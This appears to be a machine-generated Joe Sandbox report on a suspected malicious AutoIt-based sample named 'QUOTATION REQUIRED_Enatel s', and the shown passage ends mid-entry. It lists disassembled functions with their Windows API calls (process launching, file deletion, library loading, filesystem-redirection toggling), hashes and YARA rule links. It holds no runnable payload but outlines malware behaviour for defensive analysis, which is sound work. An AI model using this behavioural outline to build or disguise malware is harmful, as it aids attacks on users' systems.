                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 272304278-0
                                                                                                                    • Opcode ID: 676edd7aa39d931bbaa2689965166f5b670b7ef64642a6aadb5755f25f224760
                                                                                                                    • Instruction ID: 173d368597f43e42da51c5a98ad631c2a6d905e7a23a9d9446a62dcb010ce42d
                                                                                                                    • Opcode Fuzzy Hash: 676edd7aa39d931bbaa2689965166f5b670b7ef64642a6aadb5755f25f224760
                                                                                                                    • Instruction Fuzzy Hash: F7018B72800219EFDB10AF64DD08BAA7BB5FF06321F640060F919A21A0CF311E41BB90
                                                                                                                    Function 00F71874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F7187F
                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00F7188B
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00F71894
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00F7189C
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00F718A5
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00F718AC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 146765662-0
                                                                                                                    • Opcode ID: 164c144de27216150ff323a5f10ad996f720d5b21834b5e987e9fabcacc640b7
                                                                                                                    • Instruction ID: c0bbc7e9369c8153c54fc01143a302e2db3a28abef6c169bd1f706689546e46c
                                                                                                                    • Opcode Fuzzy Hash: 164c144de27216150ff323a5f10ad996f720d5b21834b5e987e9fabcacc640b7
                                                                                                                    • Instruction Fuzzy Hash: FFE0EDB6104209BBDB015FA2ED0C906BF79FF4A7217108220F22581071CB325421EF90
                                                                                                                    Function 00F7C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F17620: _wcslen.LIBCMT ref: 00F17625
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F7C6EE
                                                                                                                    • _wcslen.LIBCMT ref: 00F7C735
                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F7C79C
                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F7C7CA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1227352736-4108050209
                                                                                                                    • Opcode ID: 23602a0095893679aed85267fb5574f1df4064acf2de10998d377d5b30368d35
                                                                                                                    • Instruction ID: 9729bad80adfc058a2d29e022f5fe72a1d868410104051cbed0e8082296cc052
                                                                                                                    • Opcode Fuzzy Hash: 23602a0095893679aed85267fb5574f1df4064acf2de10998d377d5b30368d35
                                                                                                                    • Instruction Fuzzy Hash: D251D071A043009BD7189F29CC85B6B77E4AF89320F048A2EF999D31D1DB74D945BB93
                                                                                                                    Function 00F9AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00F9AEA3
                                                                                                                      • Part of subcall function 00F17620: _wcslen.LIBCMT ref: 00F17625
                                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 00F9AF38
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00F9AF67
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                    • String ID: <$@
                                                                                                                    • API String ID: 146682121-1426351568
                                                                                                                    • Opcode ID: 54bec623e512ad836021a7cda40a78bafe58b0d5916c86d4c9b32fd4fb6a6210
                                                                                                                    • Instruction ID: 87b7dc1f3b8bd114cb59d56391e8779455cbddbdd49abe02ce616fe04fc1bc5f
                                                                                                                    • Opcode Fuzzy Hash: 54bec623e512ad836021a7cda40a78bafe58b0d5916c86d4c9b32fd4fb6a6210
                                                                                                                    • Instruction Fuzzy Hash: FD716770A00619DFDF14EF55C884A9EBBF1BF08314F048499E81AAB252CB74ED85DB91
                                                                                                                    Function 00F7719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F77206
                                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F7723C
                                                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F7724D
                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F772CF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                    • String ID: DllGetClassObject
                                                                                                                    • API String ID: 753597075-1075368562
                                                                                                                    • Opcode ID: a4e69430818d43f2565ad5e80989329f1fc584b93943570785ad4258c1a57950
                                                                                                                    • Instruction ID: 8ac9c41487fe1f3e9594cb37481311530ad8ab4e8400be4fabe12c7e8357ff46
                                                                                                                    • Opcode Fuzzy Hash: a4e69430818d43f2565ad5e80989329f1fc584b93943570785ad4258c1a57950
                                                                                                                    • Instruction Fuzzy Hash: 49419EB1A14304EFDB15DF54C884A9A7BA9EF44310F1480AABD09DF20AD7B0D944EFA1
                                                                                                                    Function 00FA3D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FA3E35
                                                                                                                    • IsMenu.USER32(?), ref: 00FA3E4A
                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FA3E92
                                                                                                                    • DrawMenuBar.USER32 ref: 00FA3EA5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 3076010158-4108050209
                                                                                                                    • Opcode ID: 610fdf4e9fed0cba79bfff97a16c72be18bae6ca0b3589517003477be9a01598
                                                                                                                    • Instruction ID: e72a7cb20db103fcbd2a33ce7990e3b23a550df5ce61309277fb65ae49a6e96a
                                                                                                                    • Opcode Fuzzy Hash: 610fdf4e9fed0cba79bfff97a16c72be18bae6ca0b3589517003477be9a01598
                                                                                                                    • Instruction Fuzzy Hash: C3412BB5E11209EFDB10DF50D8C4A9AB7B5FF46365F04411AF90597250D730AE49EF50
                                                                                                                    Function 00F71DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F73CCA
                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F71E66
                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F71E79
                                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00F71EA9
                                                                                                                      • Part of subcall function 00F16B57: _wcslen.LIBCMT ref: 00F16B6A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$_wcslen$ClassName
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 2081771294-1403004172
                                                                                                                    • Opcode ID: eee34adfc78481cc59158801a5643e52382330bf6ad62d59c6e98df5ae0b8e54
                                                                                                                    • Instruction ID: 1f48990b72069d93d8725b61c966d4c0d5b8ecd89e72d829cb939067f22f278c
                                                                                                                    • Opcode Fuzzy Hash: eee34adfc78481cc59158801a5643e52382330bf6ad62d59c6e98df5ae0b8e54
                                                                                                                    • Instruction Fuzzy Hash: 9D216B71A00108BEDB149B68DC56CFFB7B8EF42360B14812AF859A32E1DB785D4DB661
                                                                                                                    Function 00FA2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00FA2F8D
                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00FA2F94
                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00FA2FA9
                                                                                                                    • DestroyWindow.USER32(?), ref: 00FA2FB1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                    • String ID: SysAnimate32
                                                                                                                    • API String ID: 3529120543-1011021900
                                                                                                                    • Opcode ID: 8dfcd14c0e82500a461cdbd15f22e4becafbfc75aa01950f8e40930650297ffc
                                                                                                                    • Instruction ID: 4767183dfa5f5a8164e5938456a33798bfa76095b4d82a396b083fdd6405765d
                                                                                                                    • Opcode Fuzzy Hash: 8dfcd14c0e82500a461cdbd15f22e4becafbfc75aa01950f8e40930650297ffc
                                                                                                                    • Instruction Fuzzy Hash: 5E216AB2B04209AFEB508F68DC80EBB77B9EB5A374F104619F950D6190D771DC91B7A0
                                                                                                                    Function 00F34D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F34D1E,00F428E9,?,00F34CBE,00F428E9,00FD88B8,0000000C,00F34E15,00F428E9,00000002), ref: 00F34D8D
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F34DA0
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00F34D1E,00F428E9,?,00F34CBE,00F428E9,00FD88B8,0000000C,00F34E15,00F428E9,00000002,00000000), ref: 00F34DC3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                    • Opcode ID: 78fe8e7ad4dd93f3d578e658e93e577b1904589132361c189db5bf719f8356c6
                                                                                                                    • Instruction ID: 2dfb18ea890b0fbb2c81408059c818c2c8a485eee5c4d105832e89438ef42780
                                                                                                                    • Opcode Fuzzy Hash: 78fe8e7ad4dd93f3d578e658e93e577b1904589132361c189db5bf719f8356c6
                                                                                                                    • Instruction Fuzzy Hash: 5CF03C75A4020CABDB119B95DC49BAEBFE5EB44762F0001A5E806A2260CF74A940EED1
                                                                                                                    Function 00F14E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F14EDD,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14E9C
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F14EAE
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00F14EDD,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14EC0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                    • API String ID: 145871493-3689287502
                                                                                                                    • Opcode ID: 503ac4e7634ac07ba73e7ab7c45ad3eec3e5b7c851749e88852371392af3066e
                                                                                                                    • Instruction ID: 0506fde285864f7fb4cba61181df19c5d78cb9f51bcc97be8837e1f09535ce66
                                                                                                                    • Opcode Fuzzy Hash: 503ac4e7634ac07ba73e7ab7c45ad3eec3e5b7c851749e88852371392af3066e
                                                                                                                    • Instruction Fuzzy Hash: 98E08675F015225B923117256C18B9B7554AFC2B727090115FD04D2200DB60DD4165E2
                                                                                                                    Function 00F14E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F53CDE,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14E62
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F14E74
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00F53CDE,?,00FE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F14E87
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                    • API String ID: 145871493-1355242751
                                                                                                                    • Opcode ID: 4aa6d9d66b69ea18c3c3ce7ba67ea0a3e8efe08c371db0e24ee8c553524dd1c3
                                                                                                                    • Instruction ID: 28b16099b53a66c154b746c685d0e8fd8c944c7e8b5392c813d84a56019507a4
                                                                                                                    • Opcode Fuzzy Hash: 4aa6d9d66b69ea18c3c3ce7ba67ea0a3e8efe08c371db0e24ee8c553524dd1c3
                                                                                                                    • Instruction Fuzzy Hash: E0D01279A026235756221B267C18ECB7A18AFC6B653090615F905A2114CF61DD42B6E1
                                                                                                                    Function 00F82947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F82C05
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00F82C87
                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F82C9D
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F82CAE
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F82CC0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Delete$Copy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3226157194-0
                                                                                                                    • Opcode ID: 96761955e030a6ee238548e45e8905f5a785880dc922e4705a27199c7f1a94c4
                                                                                                                    • Instruction ID: e90103c412925bfef744f6c4de3341d119cb5d3aae3714f678c99f051e73fda1
                                                                                                                    • Opcode Fuzzy Hash: 96761955e030a6ee238548e45e8905f5a785880dc922e4705a27199c7f1a94c4
                                                                                                                    • Instruction Fuzzy Hash: 09B18072D01119ABDF55EFA4CC85EEEB7BDEF49310F0040A6F509E6141EB34AA449F61
                                                                                                                    Function 00F9A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00F9A427
                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F9A435
                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F9A468
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00F9A63D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3488606520-0
                                                                                                                    • Opcode ID: 9b79e8b51b9c00b50b18a91512802c4056cf1686dc5868f174189837e5a33d11
                                                                                                                    • Instruction ID: 40697c057a4b3fc26e82ab73f7d6f9bbcb9af6ae3ce385cd087b338d217eefa4
                                                                                                                    • Opcode Fuzzy Hash: 9b79e8b51b9c00b50b18a91512802c4056cf1686dc5868f174189837e5a33d11
                                                                                                                    • Instruction Fuzzy Hash: B7A1A071604300AFEB20DF24D886F2AB7E5AF84714F14881DF95A9B292DB74EC41DB92
                                                                                                                    Function 00F4BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00FB3700), ref: 00F4BB91
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00FE121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00F4BC09
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00FE1270,000000FF,?,0000003F,00000000,?), ref: 00F4BC36
                                                                                                                    • _free.LIBCMT ref: 00F4BB7F
                                                                                                                      • Part of subcall function 00F429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000), ref: 00F429DE
